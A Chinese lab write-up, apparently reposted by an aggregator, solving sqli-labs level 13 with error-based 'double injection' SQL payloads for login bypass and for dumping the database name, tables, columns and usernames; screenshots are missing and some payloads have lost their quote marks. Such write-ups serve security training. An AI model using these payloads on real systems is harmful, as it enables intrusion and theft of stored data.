sqli-lab(13)

Posted -zhong

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-lab(13)相关的知识,希望对你有一定的参考价值。

Double Injection- String- with twist(双注入 - 字符型 - 变形)

来进行我们的注入测试

直接闭合,用户名和密码输入“ ‘) or (‘1’) = (‘1%23 ” 双引号里面的语句,前面的单引号加括号和sql中的括号单引号闭合,后边的也闭合了,看图片:

技术图片

一切都是对的,为什么还是登录失败?

因为username那儿变成空的了,所以前面随便加上一个用户名就行了。

技术图片

 

看红箭头,加上用户名和密码的名称就登录成功了

发现

技术图片

那我们来尝试一下闭合 语句

) order by 1#

 

技术图片

0X02爆库名

 

) union select null,database()#

技术图片

哦豁 回显信息 那我们只有通过报错来进行注入了

 按我们前面学习的双注入来

1) union select count(*),concat_ws(:,(select user()),(select database()),floor(rand()*2)) as a from information_schema.tables group by a#

技术图片

成功

OX03爆表名

) union select count(*),concat_ws(++,(select table_name from information_schema.tables where table_schema=security),floor(rand()*2)) as a from information_schema.tables group by a#

有事这个错误  limit一个一个的看吧 唉

) union select count(*),concat_ws(++,(select table_name from information_schema.tables where table_schema=security limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#

技术图片

0X04爆列名

) union select count(*),concat_ws(+,(select column_name from information_schema.columns where table_name=users limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#

技术图片

0X05爱之深入了解 爆字段

) union select count(*),concat_ws(;,(select username from users limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#

 

技术图片

这里我是一个字段一个字段的爆破的 .

以上是关于sqli-lab(13)的主要内容,如果未能解决你的问题,请参考以下文章

VSCode自定义代码片段13——Vue的状态大管家

VSCode自定义代码片段13——Vue的状态大管家

VSCode自定义代码片段13——Vue的状态大管家

关于phpstudy搭建Sqli-lab出现问题汇总

关于phpstudy搭建Sqli-lab出现问题汇总

sqli-lab(14)